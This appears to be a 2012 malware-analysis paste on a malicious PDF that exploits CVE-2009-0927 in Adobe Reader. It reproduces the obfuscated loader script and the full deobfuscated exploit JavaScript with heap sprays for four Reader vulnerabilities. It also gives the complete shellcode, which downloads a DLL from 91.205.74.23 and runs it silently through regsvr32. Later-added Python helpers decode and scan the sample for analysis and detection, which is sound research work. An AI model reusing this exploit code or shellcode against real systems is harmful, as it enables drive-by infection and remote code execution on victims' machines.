unixfreaxjp

#Malware Anlsys PDF/CVE-2009-0927/Adobe getIcon Exploit Pack

Apr 19th, 2012
Virus Total report is:
https://www.virustotal.com/file/16e7b2f923b0c6f4c194ae791848b70030fa2093da0ee95a3ee926abd679fb81/analysis/

Sample:
MD5: 5e77446f3a89fac8cabb49b69cb1471c
File size: 11.8 KB ( 12088 bytes )
File name: dropped.pdf
File type: PDF

This is a malicious PDF that exploits the PC through CVE-2009-0927 (the Adobe getIcon flaw), then downloads a payload and runs it as a process/daemon on the PC. This malicious PDF is used as an infection component by several exploit packs to drop malware such as ZeuS/Carberp/Ramnit, etc. Below is the analysis in detail:
=====================
Found Here:
=====================
[code] --00:40:54-- hxxp://91.205.74.23/content/adp1.php?f=172
=> `adp1.php@f=172'
Connecting to 91.205.74.23:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12,088 (12K) [application/pdf]
100%[====================================>] 12,088 --.--K/s
00:40:54 (3.52 MB/s) - `adp1.php@f=172' saved [12088/12088] [/code]

=====================
Malware PDF Structure is:
=====================
[code] %PDF-1.6
%âãÏÓ
7 0 obj
<</Count 1/Type/Pages/Kids[28 0 R]>>
endobj
21 0 obj
<</Names 23 0 R/AcroForm 22 0 R/Pages 7 0 R/OCProperties<</D<</RBGroups[]>>>>/StructTreeRoot 11 0 R/Type/Catalog>>
endobj
23 0 obj
<</JavaScript 24 0 R/AP 8 0 R>>
endobj
24 0 obj
<</Names[123 0 R 76 0 R]>>
endobj
25 0 obj
<</S/JavaScript/JS 26 0 R>>
endobj
26 0 obj
<</Length 1108/Filter[/FlateDecode]>>stream
endstream
endobj
28 0 obj
<</Parent 7 0 R/Contents 60 0 R/Rotate 90/MediaBox[0 0 12 92]/Resources<</XObject<</Im0 69 0 R>>/ColorSpace<</CS0 59 0 R>>/Font<</TT0 61 0 R>>/Properties/ExtGState>>/Type/Page>>
endobj
60 0 obj
<</Length 539/Filter/FlateDecode/Type/Contents>>stream
endstream
endobj
76 0 obj
<</S/JavaScript/JS(
x='e';
arr='71@2@53@69@53@59@3@59@17@17@0@32@57@20@6@59@36@35@41@42@38@38@36@35@2@60@69@15@36@35@41@26@2@60@36@35@45@26@69@15@36@35@69@7@42@15@36@35@42@42@26@2@36@35@38@15@60@5@36@35@15@5@41@0@36@35@41@0@42@5@36@35@5@60@15@5@36@35@45@5@41@0@36@35@26@38@3@60@36@35@45@38@41@0@36@35@42@42@5@41@36@35@38@38@40@0@36@35@26@69@41@0@36@35@5@42@42@60@36@35@42@42@45@15@36@35@...........
...........
...........

8@39@29@67@70@71@57@48@68@69@40@71@49@48@23@69@37@56@10@49@39@69@28@53@23@35@10@10@17@55@25@60@49@67@60@70@53@69@17@29@25@49@53@17@55@25@25';
cc={q:'b+f1k0=9-vl&WA|4 \)<:gDQnS}5zr{oVjpNu%w6yd83_,7EG.a@2>\(I;PsM"c[/Cx]Ktmehi*Uq"'}.q;
q=x+'v'+'al';
a=\(Date+String\).substr\(2,3\);
aa=\([].unshift+[].reverse\).substr\(2,3\);
if \(aa==a\){
t='3vtwe';
e=t['substr'];
w=e\(12\)[q];
s=[];
ar=arr.split\('@'\);
n=cc;
for\(i=0;i<ar.length;i++\){
s[i]=n[ar[i]];
}
if\(a===aa\)w\(s.join\(''\)\);
}
)>>
endobj
xref
0 155
trailer
<</Size 155
/Root 21 0 R>>
xref
0 0
trailer
<</Size 155/Prev 75626/XRefStm 416/Root 21 0 R>>
startxref
78995
%%EOF [/code]
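The script in object 76 is obfuscated with a lookup table: `cc` is a 76-character alphabet, `arr` is a list of `@`-separated indices into it, the loop `s[i]=n[ar[i]]` rebuilds the text one character at a time, and `w(s.join(''))` runs the result through a function fetched under the name built by `q=x+'v'+'al'`. Before that, the `aa==a` gate stringifies two pairs of built-in functions (`Date+String` and `[].unshift+[].reverse`) and compares three characters of each; in a real engine both strings start with "function", so both give "nct" and the gate passes, while an emulator that stubs built-ins differently never reaches the eval. The Python decoder below is an added example and not part of the paste: it takes the alphabet exactly as it appears on the page once the PDF string escapes `\(` and `\)` are undone, plus the visible head of `arr` (the rest is elided above with dots), and recovers the start of the eval'd text. The regular expressions that pull the two literals out of script text are my own assumption about the layout and match only this family's `arr='...'` / `cc={q:'...'}.q` form.

```python
import re

# Added example (not from the original paste): decode the index-alphabet
# obfuscation used by the PDF's JavaScript. `cc` is the alphabet, `arr` holds
# '@'-separated indices into it, and the joined characters are handed to eval.

# Alphabet copied from the paste with the PDF literal-string escapes undone
# (`\)` -> `)`, `\(` -> `(`); it contains no single quote and no backslash.
ALPHABET = 'b+f1k0=9-vl&WA|4 )<:gDQnS}5zr{oVjpNu%w6yd83_,7EG.a@2>(I;PsM"c[/Cx]Ktmehi*Uq"'

# The visible head of `arr` on the page (the paste elides the rest with dots).
ARR_PREFIX = (
    "71@2@53@69@53@59@3@59@17@17@0@32@57@20@6@59@36@35@41@42@38@38@36@35@2@60"
    "@69@15@36@35@41@26@2@60@36@35@45@26@69@15@36@35@69@7@42@15@36@35@42@42@26"
    "@2@36@35@38@15@60@5@36@35@15@5@41@0@36@35@41@0@42@5@36@35@5@60@15@5@36@35"
    "@45@5@41@0@36@35@26@38@3@60@36@35@45@38@41@0@36@35@42@42@5@41@36@35@38@38"
    "@40@0@36@35@26@69@41@0@36@35@5@42@42@60@36@35@42@42@45@15@36@35"
)


def decode_indexed(indices: str, alphabet: str = ALPHABET, sep: str = "@") -> str:
    """Mirror the loop s[i] = n[ar[i]]: every token is an index into the
    alphabet. An empty token (trailing separator) is skipped, which matches
    JavaScript joining `undefined` as an empty string."""
    out = []
    for tok in indices.split(sep):
        if not tok:
            continue
        idx = int(tok)
        if idx >= len(alphabet):
            raise ValueError(f"index {idx} outside the {len(alphabet)}-char alphabet")
        out.append(alphabet[idx])
    return "".join(out)


# Regexes for this family's literal layout (assumed; the page shows exactly
# these two forms: arr='digits@digits...' and cc={q:'alphabet'}.q).
ARR_RE = re.compile(r"arr\s*=\s*'([0-9@]+)'")
CC_RE = re.compile(r"cc\s*=\s*\{q:'(.*?)'\}\.q", re.S)


def extract_and_decode(js: str) -> str:
    """Pull `arr` and `cc` out of already PDF-unescaped script text and decode."""
    arr = ARR_RE.search(js)
    cc = CC_RE.search(js)
    if arr is None or cc is None:
        raise ValueError("arr/cc literals not found in script")
    return decode_indexed(arr.group(1), cc.group(1))


# Constructed stand-in for the script text, built from the page's two literals.
SAMPLE_JS = (
    "x='e';\n"
    "arr='" + ARR_PREFIX + "';\n"
    "cc={q:'" + ALPHABET + "'}.q;\n"
    "q=x+'v'+'al';\n"
)

if __name__ == "__main__":
    print(extract_and_decode(SAMPLE_JS))
```

Decoding the visible prefix yields `if(e("1"))bjsg="%u8366%ufce4%u85fc...%u3374%u`, which is the beginning of the deobfuscated listing further down once the pretty-printer's spacing is ignored; the remaining indices were elided on the page, so the decoder stops where the paste does.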

=====================
If you deobfuscate the JS, the eval'd value comes up as:
=====================
[code] if (e("1"))bjsg = "
%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db
%u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175
%uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33
%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b
%uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433
%u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68
%u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d
%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224
%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b
%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830
%u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83
%u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff
%ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f
%u7468%u7074%u2f3a%u392f%u2e31%u3032%u2e35%u3437%u322e%u2f33%u2e77%u6870%u3f70%u3d66%u3731
%u2632%u3d65%u0033%u0000";
function ezvr(ra, qy){
while (ra.length * 2 < qy){
ra += ra;
}
ra = ra.substring(0, qy / 2);
return ra;
}
function bx(){
var dkg = new Array();
var vw = 0x0c0c0c0c;
var addr = 0x400000;
var payload = unescape(bjsg);
var sc_len = payload.length * 2;
var qy = addr - (sc_len + 0x38);
var yarsp = unescape("%u9090%u9090");
yarsp = ezvr(yarsp, qy);
var count2 = (vw - 0x400000) / addr;
for (var count = 0; count < count2; count ++ ){
dkg[count] = yarsp + payload;
}
var overflow = unescape("%u0c0c%u0c0c");
while (overflow.length < 44952){
overflow += overflow;
}
this .collabStore = Collab.collectEmailInfo({
subj : "", msg : overflow
}
);
}
function printf(){
nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
var payload = unescape(bjsg);
heapblock = nop + payload;
bigblock = unescape("%u0A0A%u0A0A");
headersize = 20;
spray = headersize + heapblock.length;
while (bigblock.length < spray){
bigblock += bigblock;
}
fillblock = bigblock.substring(0, spray);
block = bigblock.substring(0, bigblock.length - spray);
while (block.length + spray < 0x40000){
block = block + block + fillblock;
}
mem = new Array();
for (i = 0; i < 1400; i ++ ){
mem[i] = block + heapblock;
}
var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f", num);
}
function geticon(){
var arry = new Array();
if (app.doc.Collab.getIcon){
var payload = unescape(bjsg);
var hWq500CN = payload.length * 2;
var qy = 0x400000 - (hWq500CN + 0x38);
var yarsp = unescape("%u9090%u9090");
yarsp = ezvr(yarsp, qy);
var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){
arry[vqcQD96y] = yarsp + payload;
}
var tUMhNbGw = unescape("%09");
while (tUMhNbGw.length < 0x4000){
tUMhNbGw += tUMhNbGw;
}
tUMhNbGw = "N." + tUMhNbGw;
app.doc.Collab.getIcon(tUMhNbGw);
}
}
aPlugins = app.plugIns;
var sv = parseInt(app.viewerVersion.toString().charAt(0));
for (var i = 0; i < aPlugins.length; i ++ ){
if (aPlugins[i].name == "EScript"){
var lv = aPlugins[i].version;
}
}
if ((lv == 9) || ((sv == 8) && (lv <= 8.12))){
geticon();
}
else if (lv == 7.1){
printf();
}
else if (((sv == 6) || (sv == 7)) && (lv < 7.11)){
bx();
}
else if ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17)){
function a(){
util.printd("p@111111111111111111111111 : yyyy111", new Date());
}
var h = app.plugIns;
for (var f = 0; f < h.length; f ++ ){
if (h[f].name == "EScript"){
var i = h[f].version;
}
}
if ((i > 8.12) && (i < 8.2)){
c = new Array();
var d = unescape("%u9090%u9090");
var e = unescape(bjsg);
while (d.length <= 0x8000){
d += d;
}
d = d.substr(0, 0x8000 - e.length);
for (f = 0; f < 2900; f ++ ){
c[f] = d + e;
}
a();
a();
try {
this .media.newPlayer(null);
}
catch (e){
}
a();
}
}[/code]
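The deobfuscated script does not run one exploit but chooses among four by reading `app.viewerVersion` and the `EScript` plug-in version: `Collab.getIcon`, `util.printf`, `Collab.collectEmailInfo` or `media.newPlayer`. The document itself wires the script in through the name tree shown in the PDF structure above (Catalog `/Names` to `/JavaScript` to `/Names [...]` to `/S/JavaScript/JS ...`), with one `/JS` value pointing at a FlateDecode stream (object 26) and the other an inline literal string whose parentheses are escaped as `\(` and `\)`, which is why the alphabet in the obfuscated code reads `\)<:` on the page. The Python below is an added example, not part of the paste: it recovers inline `/JS` literals from an uncompressed PDF (undoing the PDF string escapes), reports stream-backed scripts by object number, and flags the four API names plus the two `unescape` spray constants from the listing. The mini PDF it scans is constructed to mimic the sample's object layout and is not the sample.

```python
import re

# Added example, not part of the original paste: find /JS entries in an
# uncompressed PDF, unescape inline literal strings, and flag the Reader
# JavaScript API calls that the deobfuscated listing dispatches between.

# API names taken from the deobfuscated listing; the notes restate the
# version dispatch at the end of that listing.
INDICATORS = {
    "Collab.getIcon": "getIcon branch (EScript 9, or Reader 8 with EScript <= 8.12)",
    "util.printf": "printf branch (EScript 7.1)",
    "Collab.collectEmailInfo": "collectEmailInfo branch (Reader 6/7, EScript < 7.11)",
    "media.newPlayer": "newPlayer branch (EScript between 8.12 and 8.2)",
    'unescape("%u9090': "NOP-sled heap spray",
    'unescape("%u0c0c': "0x0c0c0c0c spray target",
}

_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "b": "\b", "f": "\f",
            "(": "(", ")": ")", "\\": "\\"}


def parse_literal(text: str, start: int):
    """Parse the PDF literal string whose '(' is at text[start]. Returns the
    unescaped content and the index just past the closing ')'. Unescaped
    parentheses nest; a backslash starts an escape (named escape, escaped
    paren, up to three octal digits, or a line continuation)."""
    if text[start] != "(":
        raise ValueError("not at a literal string")
    depth, i, out = 1, start + 1, []
    while i < len(text):
        ch = text[i]
        if ch == "\\":
            nxt = text[i + 1]
            if nxt in _ESCAPES:
                out.append(_ESCAPES[nxt]); i += 2
            elif nxt in "01234567":
                j = i + 1
                while j < i + 4 and j < len(text) and text[j] in "01234567":
                    j += 1
                out.append(chr(int(text[i + 1:j], 8))); i = j
            elif nxt == "\n":
                i += 2
            else:
                out.append(nxt); i += 2
            continue
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                return "".join(out), i + 1
        out.append(ch)
        i += 1
    raise ValueError("unterminated literal string")


_JS_KEY = re.compile(r"/JS(?![A-Za-z])\s*")
_REF = re.compile(r"(\d+)\s+\d+\s+R")


def find_js(pdf: str) -> list:
    """Every /JS entry: inline literals are decoded; stream references are
    reported by object number (they need FlateDecode before inspection)."""
    found = []
    for m in _JS_KEY.finditer(pdf):
        i = m.end()
        if pdf.startswith("(", i):
            body, _ = parse_literal(pdf, i)
            found.append({"kind": "inline", "js": body})
        else:
            ref = _REF.match(pdf, i)
            if ref:
                found.append({"kind": "stream", "obj": int(ref.group(1)), "js": None})
    return found


def scan(pdf: str) -> dict:
    """Count inline scripts, list stream-backed ones, and collect indicators."""
    report = {"inline_scripts": 0, "stream_scripts": [], "flags": []}
    for entry in find_js(pdf):
        if entry["kind"] == "stream":
            report["stream_scripts"].append(entry["obj"])
            continue
        report["inline_scripts"] += 1
        for name in INDICATORS:
            if name in entry["js"] and name not in report["flags"]:
                report["flags"].append(name)
    return report


# Constructed mini PDF that mimics the sample's object layout (not the sample).
SAMPLE_PDF = r"""%PDF-1.6
21 0 obj
<</Names 23 0 R/Pages 7 0 R/Type/Catalog>>
endobj
23 0 obj
<</JavaScript 24 0 R>>
endobj
24 0 obj
<</Names[(a)25 0 R(b)76 0 R]>>
endobj
25 0 obj
<</S/JavaScript/JS 26 0 R>>
endobj
76 0 obj
<</S/JavaScript/JS(
cc={q:'4 \)<:gDQnS\(I;Ps'}.q;
if \(app.doc.Collab.getIcon\){ app.doc.Collab.getIcon\("N." + pad\); }
else { util.printf\("%45000f", num\); }
)>>
endobj
%%EOF
"""

if __name__ == "__main__":
    print(scan(SAMPLE_PDF))
```

On the constructed file the scanner reports one inline script, one stream-backed script (object 26) and the flags `Collab.getIcon` and `util.printf`; on the real sample the inline script is the obfuscated loader, so the API names only appear after the index decoding, and the stream in object 26 has to be inflated first.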

=====================
Exploits found to execute malware downloads:
=====================
[code] CVE: CVE-2009-0927
Desc: Adobe getIcon
Expl: Stack-based buffer overflow in Adobe Reader and Acrobat
via the getIcon method of a Collab object [/code]

=====================
Exploit Code:
=====================
[code] 4e 2e 09 09 09 09 09 09 09 09 09 09 09 09 09 09
09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
...MORE 16,288 BYTES...
09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
09 09 [/code]

=====================
Shellcode:
=====================
[code] 66 83 e4 fc fc 85 e4 75 34 e9 5f 33 c0 64 8b 40
30 8b 40 0c 8b 70 1c 56 8b 76 08 33 db 66 8b 5e
3c 03 74 33 2c 81 ee 15 10 ff ff b8 8b 40 30 c3
46 39 06 75 fb 87 34 24 85 e4 75 51 e9 eb 4c 51
56 8b 75 3c 8b 74 35 78 03 f5 56 8b 76 20 03 f5
33 c9 49 41 fc ad 03 c5 33 db 0f be 10 38 f2 74
08 c1 cb 0d 03 da 40 eb f1 3b 1f 75 e6 5e 8b 5e
24 03 dd 66 8b 0c 4b 8d 46 ec ff 54 24 0c 8b d8
03 dd 8b 04 8b 03 c5 ab 5e 59 c3 eb 53 ad 8b 68
20 80 7d 0c 33 74 03 96 eb f3 8b 68 08 8b f7 6a
05 59 e8 98 ff ff ff e2 f9 e8 00 00 00 00 58 50
6a 40 68 ff 00 00 00 50 83 c0 19 50 55 8b ec 8b
5e 10 83 c3 05 ff e3 68 6f 6e 00 00 68 75 72 6c
6d 54 ff 16 83 c4 08 8b e8 e8 61 ff ff ff eb 02
eb 72 81 ec 04 01 00 00 8d 5c 24 0c c7 04 24 72
65 67 73 c7 44 24 04 76 72 33 32 c7 44 24 08 20
2d 73 20 53 68 f8 00 00 00 ff 56 0c 8b e8 33 c9
51 c7 44 1d 00 77 70 62 74 c7 44 1d 05 2e 64 6c
6c c6 44 1d 09 00 59 8a c1 04 30 88 44 1d 04 41
51 6a 00 6a 00 53 57 6a 00 ff 56 14 85 c0 75 16
6a 00 53 ff 56 04 6a 00 83 eb 0c 53 ff 56 04 83
c3 0c eb 02 eb 13 47 80 3f 00 75 fa 47 80 3f 00
75 c4 6a 00 6a fe ff 56 08 e8 9c fe ff ff 8e 4e
0e ec 98 fe 8a 0e 89 6f 01 bd 33 ca 8a 5b 1b c6
46 79 36 1a 2f 70 68 74 74 70 3a 2f 2f 39 31 2e
32 30 35 2e 37 34 2e 32 33 2f 77 2e 70 68 70 3f
66 3d 31 37 32 26 65 3d 33 00 00 00 [/code]
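The `bjsg` string in the deobfuscated script and this hex dump are the same bytes in two notations: JavaScript `unescape("%uXXXX")` produces one UTF-16 code unit per group, and the 32-bit Reader process stores each unit little-endian, so `%u8366%ufce4` is laid out as `66 83 e4 fc`, the first four bytes above. The Python below is an added example (not from the paste) that emulates `unescape()`, lays the units out as UTF-16LE, and pulls printable strings from the result. The excerpts are copied from the listing further up: its first line, the three lines that build the command line, and the two lines carrying the URL; everything else in the block is constructed.

```python
import re
import struct

# Added example (not from the original paste): turn the %u-encoded payload
# string from the script into the bytes the hex dump shows, then look for
# printable strings in them.

_UNIT_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})|(.)", re.S)


def js_unescape_units(s: str) -> list:
    """Emulate JavaScript unescape(): %uXXXX -> one code unit, %XX -> one
    code unit, any other character -> its own code point."""
    units = []
    for m in _UNIT_RE.finditer(s):
        if m.group(1) is not None:
            units.append(int(m.group(1), 16))
        elif m.group(2) is not None:
            units.append(int(m.group(2), 16))
        else:
            units.append(ord(m.group(3)))
    return units


def to_memory_bytes(s: str) -> bytes:
    """Lay the code units out as a 32-bit process would: UTF-16LE."""
    return b"".join(struct.pack("<H", u) for u in js_unescape_units(s))


def printable_strings(data: bytes, min_len: int = 4) -> list:
    """Runs of printable ASCII (0x20-0x7e) at least min_len bytes long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


# Excerpts of the bjsg string copied from the listing above: its first line,
# the three lines that build the command line, and the two carrying the URL.
EXCERPTS = {
    "head": "%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db",
    "cmdline": (
        "%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224"
        "%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b"
        "%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830"
    ),
    "url": (
        "%u7468%u7074%u2f3a%u392f%u2e31%u3032%u2e35%u3437%u322e%u2f33%u2e77%u6870%u3f70%u3d66%u3731"
        "%u2632%u3d65%u0033%u0000"
    ),
}


def analyze(excerpts: dict = EXCERPTS) -> dict:
    """For each excerpt: the raw bytes as a hex string (to compare with the
    dump) and the printable strings found in them."""
    report = {}
    for name, blob in excerpts.items():
        data = to_memory_bytes(blob)
        report[name] = {"hex": data.hex(), "strings": printable_strings(data)}
    return report


if __name__ == "__main__":
    for name, info in analyze().items():
        print(name, info["hex"][:32], info["strings"])
```

The head decodes to `66 83 e4 fc fc 85 e4 75 ...`, the first row of the dump. The URL excerpt yields `http://91.205.74.23/w.php?f=172&e=3`, the `szURL` seen in the execution trace below, while the command-line excerpt gives only fragments such as `$regs`, `vr32`, `wpbt` and `.dll`: they are 4-byte immediates of `mov` instructions that assemble the pieces of `regsvr32 -s` and `wpbt0.dll` on the stack at run time, which is why the API trace, not a strings pass, shows the full command line.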
=====================
Shellcode execution commands (uses: kernel32.DLL & urlmon.DLL)
=====================
[code] 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4021be, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fa60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=hxxp://91.205.74.23/w.php?f=172&e=3, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll) 0
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0) [/code]
=====================
Shellcode Meanings:
=====================
[code] Preps the env to exec a command, calls the urlmon lib to download hxxp://91.205.74.23/w.php?f=172&e=3,
then saves it at C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll and executes it SILENTLY w/ WinExec,
also registers it to run as a process/daemon w/ the registry command (regsvr32 -s), and then exits. [/code]

------
ZeroDay Japan http://0day.jp
OPERATION CLEANUP JAPAN | #OCJP
Analyst: Hendrik ADRIAN アドリアン・ヘンドリック Malware Researcher VT/ twitter/google: @unixfreaxjp
sponsored by: 株式会社ケイエルジェイテック http://www.kljtech.com